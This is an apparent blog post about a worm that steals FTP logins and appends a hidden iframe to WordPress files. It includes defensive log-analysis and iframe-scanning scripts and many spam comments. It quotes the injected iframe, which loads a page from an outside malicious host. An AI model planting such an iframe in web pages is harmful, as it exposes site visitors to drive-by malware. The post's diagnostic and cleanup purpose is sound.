Completely Remove Malware from Your Computer – Malware / Worm that steals FTP login information
This week I got an error on almost all of my WordPress blogs; it occurred twice in the past 5 days. It really made me worried and giddy, because there was just a blank page with an error message like this:
Warning: Unexpected character in input: ''' (ASCII=39) state=1 in ….
Parse error: syntax error, unexpected '.' in ….
When I checked my files, I found code added at the bottom of them, an iframe like this:
<iframe src="http://c9u.at:8080/ts/in.cgi?pepsi147" width=125 height=125 style="visibility: hidden"></iframe>
This line tells me that I have been hacked, infected by a virus / worm.
This is a malware / worm that steals my FTP login information from my FTP programs and modifies lots of php / html / htm pages on all of the sites it can access. In the FTP log file, there are lots of entries showing someone downloading a file and then re-uploading it. It appears to modify the files destructively, overwriting whatever text was there.
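The download-then-re-upload pattern described above can be searched for in the server's transfer log. This is an added example, not part of the original post; it assumes the server writes the common xferlog format, and the log lines, host addresses and user name are constructed.

```python
from datetime import datetime, timedelta

# Constructed sample in xferlog format (assumed; the post does not name its log format).
SAMPLE_LOG = """\
Thu May 14 03:12:07 2009 1 203.0.113.7 4312 /public_html/index.php a _ o r siteuser ftp 0 * c
Thu May 14 03:12:09 2009 1 203.0.113.7 4431 /public_html/index.php a _ i r siteuser ftp 0 * c
Thu May 14 03:12:11 2009 1 203.0.113.7 2210 /public_html/blog/footer.php a _ o r siteuser ftp 0 * c
Thu May 14 03:12:12 2009 1 203.0.113.7 2329 /public_html/blog/footer.php a _ i r siteuser ftp 0 * c
Thu May 14 09:30:00 2009 2 198.51.100.20 9000 /public_html/theme.zip b _ i r siteuser ftp 0 * c
Thu May 14 09:45:00 2009 1 198.51.100.20 512 /public_html/robots.txt a _ o r siteuser ftp 0 * c
"""
WEB_EXT = (".php", ".html", ".htm")  # the page types the post says were modified

def parse_xferlog(line):
    """Return (time, host, size, path, direction) or None for a malformed line."""
    f = line.split()
    if len(f) < 18:
        return None
    try:
        when = datetime.strptime(" ".join(f[:5]), "%a %b %d %H:%M:%S %Y")
        size = int(f[7])
    except ValueError:
        return None
    return when, f[6], size, f[8], f[11]  # f[11]: 'o' = download, 'i' = upload

def find_rewrites(log_text, window=timedelta(minutes=5)):
    """Flag web files downloaded and then re-uploaded by the same host within the window."""
    last_download = {}  # (host, path) -> (time, size)
    hits = []
    for line in log_text.splitlines():
        rec = parse_xferlog(line)
        if rec is None:
            continue
        when, host, size, path, direction = rec
        if not path.lower().endswith(WEB_EXT):
            continue
        key = (host, path)
        if direction == "o":
            last_download[key] = (when, size)
        elif direction == "i" and key in last_download:
            got_at, old_size = last_download.pop(key)
            if timedelta(0) <= when - got_at <= window:
                hits.append({"host": host, "path": path, "time": when,
                             "grew_by": size - old_size})
    return hits

if __name__ == "__main__":
    for h in find_rewrites(SAMPLE_LOG):
        print(h["time"], h["host"], h["path"], f"+{h['grew_by']} bytes")
```

A file that comes back slightly larger seconds after it was fetched, from a host that is not one of your own, is the signature to look for; the window and the extension list are tunable.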
Here’s a list of some sources that I found regarding this issue:
http://wordpress.org/support/topic/268083
http://wordpress.org/support/topic/272140
http://wordpress.org/support/topic/272379
http://ocaoimh.ie/did-your-wordpress-site-get-hacked/
The first time I faced this virus, what I did was re-upload the infected files and change my FTP password. I thought I had resolved the problem and that it would not happen again. But I was wrong: today I got this error again.
So now I really know that I need to take serious action to completely remove the worm / malware. I have to ensure that my computer is completely clean and that this doesn’t happen again.
According to Hostgator Security Support, in order to protect against future attacks, I need to run full virus and malware scans on my computer to ensure that it is clean.
Hello,
It appears that malicious code has been uploaded to your account via FTP using a compromised username and password. At this time, I have removed the malicious code from the account.
From our experience with malware of this nature, the user account passwords are compromised through viruses/malware located on your local computer. This malware sniffs out passwords used and stored by FTP programs located on the computer. In order to protect against future attack, you will need to run full virus and malware scans on your computers to ensure that they are clean. I recommend using multiple scanners as we have found that some scanners do not detect the malware. MalwareBytes ( http://www.malwarebytes.org/ ) and ComboFix ( http://www.bleepingcomputer.com/combofix/how-to-use-combofix ) have been reported to be able to clean this malware. It is highly suggested that you also do the following:
* Any computers legitimately allowed to access the account must be updated fully (Windows updates, browser updates, application updates, anti-virus updates)
* Any computers legitimately allowed to access the account must be completely scanned for viruses and secured completely
Although I’m still not sure that my computer is completely clean, I have taken some actions to protect it:
- Update my FTP password
- Update my FTP software to the newest version
- Of course, re-upload infected files and upgrade my WordPress blog to the latest version
- Scan my whole computer using Malware Bytes from www.malwarebytes.org
That is all I can do for now. I hope this error doesn’t happen again and the worm is completely removed.
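To check whether the hidden iframe has come back after a cleanup, a downloaded copy of the site can be scanned for it. This is an added example, not part of the original post; the file contents and the host in the sample iframe are constructed, and treating display:none as a related variant is an assumption.

```python
import os
import re
import tempfile

WEB_EXT = (".php", ".html", ".htm")
# An <iframe> hidden by its style attribute, as in the post: style="visibility: hidden".
# display:none is matched too (assumption about closely related variants).
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*\bstyle\s*=\s*[\"'][^\"']*(?:visibility\s*:\s*hidden|display\s*:\s*none)"
    r"[^>]*>\s*</iframe>", re.I)
SRC = re.compile(r"\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)

def find_hidden_iframes(text):
    """Return [(line_no, src, appended)]; appended means only whitespace follows the iframe."""
    found = []
    for m in HIDDEN_IFRAME.finditer(text):
        src = SRC.search(m.group(0))
        line_no = text.count("\n", 0, m.start()) + 1
        appended = text[m.end():].strip() == ""
        found.append((line_no, src.group(1) if src else "", appended))
    return found

def scan_tree(root):
    """Scan php/html/htm files under root; return {relative_path: findings} for files with hits."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(WEB_EXT):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "r", encoding="utf-8", errors="replace") as fh:
                hits = find_hidden_iframes(fh.read())
            if hits:
                report[os.path.relpath(full, root)] = hits
    return report

def demo():
    """Build a constructed two-file site copy (one infected, one clean) and scan it."""
    injected = ('<iframe src="http://malicious.example.invalid:8080/in.cgi?x" width=125 '
                'height=125 style="visibility: hidden"></iframe>')
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php\necho 'hello';\n?>\n" + injected + "\n")
        with open(os.path.join(root, "about.html"), "w") as fh:
            fh.write('<html><body><iframe src="/map.html" width=300></iframe></body></html>\n')
        return scan_tree(root)

if __name__ == "__main__":
    for path, hits in demo().items():
        print(path, hits)
```

The `appended` flag separates an iframe tacked onto the end of a file, as the post describes, from a hidden iframe that sits inside a page's normal markup and needs a closer look before it is treated as an injection.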

that’s why we need to always have an updated anti-malware, anti-spyware.. and antivirus in our PC.
I just changed my login info too.. I think I’ve become paranoid..
Upgrade every now and then. Passwords should also be changed to prevent from all these FTP hacks.
my pc is installed with deepfreeze and AVG. And don’t have problems with malwares.
Based, demand service, it does not need to be installed on every computer.
Malware or malicious software is software designed to infiltrate or damage a computer system without the owner’s informed consent.
After losing a computer to damage caused by viruses and malware, I can’t stop worrying about the security of my other PCs. I recently set up a brand new machine and I would really appreciate some advice on what firewall to install and what antivirus to use.
How did you remove this malware? If I am using AVG9, is it possible to remove malware like this?
In the market there are an enormous number of antivirus treatment solutions.
Thanks for the code man… I think many blog owners looking for this kinda codes.
There are many Anti-malware and Anti-spyware in the market but they do not remove it properly. I think this Code will help a lot, thank you for sharing this Post.
Thanks for information. This information is very important.
I recently set up a brand new machine and I would really appreciate some advice on what firewall to install and what anti virus to use. But sometime the operating system also enhance the matter of the fact as it is considered.
I purchased a domain name and a hosting plan from godaddy.com. I am using a WYSIWYG program called NVU to build my site. It asks for the Publishing Address, which is the FTP server info that I get from my web hosting service.
I once suffered this kind of hack. It allowed the hacker to post URLs right inside my post. I didn’t notice it on time. When I eventually discovered it, it took a lot of work to get the posts re-written and the malicious URLs removed. I’m going to run a malware test on my computer right away.
It can be really nauseating getting hacked. It is better to take necessary steps to prevent a hack especially as your website content gets voluminous. Else, the clean-up process can really be tasking.
THANK YOU, THIS POST IS VERY IMPORTANT
I do not have and cannot get the login information from the person who set it up. How can I… Get the login information from your friend, or from the third party who has the information…
How to remove Malware:Trojan, Virus, Worm, spyware, adware or other Malware
http://www.tips29.com/2009/01/how-to-remove-common-malwaretrojan.html
I want to switch to Ubuntu Linux but I cannot seem to find a client’s password, so I cannot switch unless I can be sure that I will be able to webmaster for her in the future.
One wishes there were some permanent solution to these viruses. A malware can really bring the computer crashing into oblivion.
Great deed and effort need to bush up recognized after all to have the best things.
Once you change your password often enough and upgrade on a regular basis, some of these FTP hacking can be obviated.
I cannot switch unless I can be sure that I will be able to webmaster for her in the future.
How would I access the server, and what do I put in the FTP host box, Host Directory box, login and password? Also, do I check any of the boxes below? And where would I find any of this information?
What are FTP programs that support uploads via url Not mere browsing existing files on the HD?
These malwares can create havoc. A good anti-virus is the only security against it.
One question that a lot of people have is what is malware and if infected, how do I remove malware? Basically, malware stands for malicious software and consists of numerous kinds of dangerous computer infections like virus, worm, Trojan, adware and spyware.
Cool blog as for me. I’d like to read a bit more about that topic. Thank you for sharing this material.
Ignoring the evils of these malware can crash your computer at any time possible.
Thanks a lot for the article. I really love to read such articles for you share different body of knowledge that people should know. I admire writers like you on providing great post that you dedicate your time in doing so. Thanks again and keep up the great work!
A good security software is the only shield against these malwares.
These malwares are on the internet and they travel via search engines. Should not search engines have some filter themselves to restrict its movements?
Viruses on computer malware/trojan?
My computer is being attacked by all these viruses, it seems like out of nowhere. A pop-up said these viruses came from visiting porn sites and torrent sites. Well, I’ve gone to one torrent site, piratebay, a couple of months ago, but why is it doing all of this? This thing is trying to get into my passwords for my PayPal, bank account and other stuff, and when I try to remove these infections it says I have to purchase the full version. Well, right now I need this gone, what do I do??
Thanks for the great reading, we will follow your blog. Gasoline blog.
How do I completely remove my myspace playlist?
I try deleting all the songs from my playlist so I don’t have to have one anymore, but the stupid thing says I have to have at least ONE song. How do I remove it?
How do I remove malware from my computer?
How do I completely remove the shortcut symbol from an icon?
Is it possible to get rid of the symbol to a shortcut in the icons?
Thanks for great information, it’s wonderful. Your site is very useful for me. I bookmarked your site!
Your post has proved invaluable in our own understanding and analysis of the issue.
That’s an insightful post. Incisive and cogent.
Very good information, you write it very clean. I’m very lucky to get this info from you.
Solution is to use suPHP on the server to manage the ownerships properly so WordPress and FTP work as they should, just a much easier situation for most people out there.
Houses are quite expensive and not everyone is able to buy it. However, business loans are created to help people in such situations.
I had Windows Update turned off, just put it back on, thanks for the tips
Unfortunately, removing Personal Antivirus through the Add/Remove Programs or by deleting its files does not always ensure the right effect. Sometimes, it may take a professional automatic removal tool to get rid of this malicious program. You can follow our automatic removal recommendations provided in our post.
Thanks for your ideas. I have installed Symantec on my PC and I update it on a regular basis. With it I don’t have any PC threat.
Hi FTP is a file transfer protocol that is managed by server all is very nice work and also critical all is lovely sharing i love this post because all is my work experience.
Really very informative post this one. I admire those writers who share the best of their knowledge in writing such articles. Keep up the good work and continue inspiring readers. Thank you so much.
Definitely quite informative post this one particular. I admire individuals writers who share the best of their know-how in writing such content articles. Retain up the excellent operate and carry on inspiring readers.
Your post has proved invaluable in our personal understanding and analysis with the concern.
Hi very great title sharing telling about Completely Remove Malware from Your Computer Malware Worm that steals FTP login information.
Hey nice article. Thanks for the information, malware has always been a challenge to handle, as many times they attack the FTP information. Your information is very viable.